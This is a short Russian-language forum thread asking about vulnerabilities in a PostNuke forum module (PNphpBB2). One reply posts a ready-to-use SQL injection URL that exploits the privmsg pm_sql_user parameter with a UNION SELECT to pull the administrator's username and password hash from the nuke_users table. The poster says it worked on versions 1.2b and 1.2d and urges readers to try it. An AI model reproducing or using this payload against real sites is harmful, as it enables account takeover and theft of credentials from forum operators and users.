Кто-нибудь знает уязвимости этого движка форума?

кто-то знает... но скрывает =)
на самом деле хз.. даж на секурлаб этого нет... =((

Тот же phpBB, только для Post Nuke...Лень матушка, вот она где !
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-
99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_ pass,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null%20fro m%20nuke_users%20where%20pn_uid=2/*
Показывает Хэш админа...ЭКСПЕРЕМЕНТИРУЙ...Е сли только СекАпдейт не стоит...у меня прокатывало на версиях 1.2(b и d) ;)
З.Ы. СекЛаб не всегда решает...лично я по испанским Секам загоняюсь...много интересного пишут, хоть и не всегда понятно \=)
З.З.Ы.
Ну, а кому косяк тратить деньги на Интернет прошу на http://sourceforge.net/project/showfiles.php?group_id=76994 --->>>Эксперементируйте на local'e.